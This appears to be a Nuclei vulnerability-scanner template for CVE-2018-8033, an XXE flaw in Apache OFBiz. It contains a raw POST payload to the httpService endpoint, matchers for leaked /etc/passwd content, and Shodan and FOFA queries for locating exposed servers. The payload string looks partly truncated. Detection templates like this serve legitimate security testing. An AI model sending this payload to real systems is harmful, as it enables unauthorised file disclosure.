id: CVE-2018-8033 info: name: Apache OFBiz - XML External Entity Injection author: daffainfo severity: high description: | In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host. impact: | Attackers can read sensitive files or cause denial of service by exploiting XXE vulnerability. remediation: | Update to the latest version of Apache OFBiz that addresses the XXE vulnerability or apply security patches. reference: - https://lists.apache.org/thread/9bym7qk6ccwwr6d3mg26thp9zyv1l06y - https://nvd.nist.gov/vuln/detail/CVE-2018-8033 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-8033 cwe-id: CWE-200 epss-score: 0.92188 epss-percentile: 0.99728 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: apache product: ofbiz shodan-query: - http.html:"ofbiz" - ofbiz.visitor= fofa-query: - body="ofbiz" - app="apache_ofbiz" tags: cve,cve2018,apache,ofbiz,xxe,vuln http: - raw: - | POST /webtools/control/httpService HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded serviceName=createPartyGroup&serviceMode=sync&serviceContext=%25request;%25secondstage;]>%26disclose; matchers-condition: and matchers: - type: regex part: body regex: - "FileNotFoundException:" - "nonexistent\\/root:.*:0:0:" condition: and - type: status status: - 200 # digest: 490a004630440220576d7368623b13e274c518c31d90c7703d06dfa4f936a77b15fa29fbfbcfd1b6022078100fdb7dab76d52f31a8f55e98dae996a843d20b33d11f2fcde94282ceb13e:922c64590222798bb761d5b6d8e72950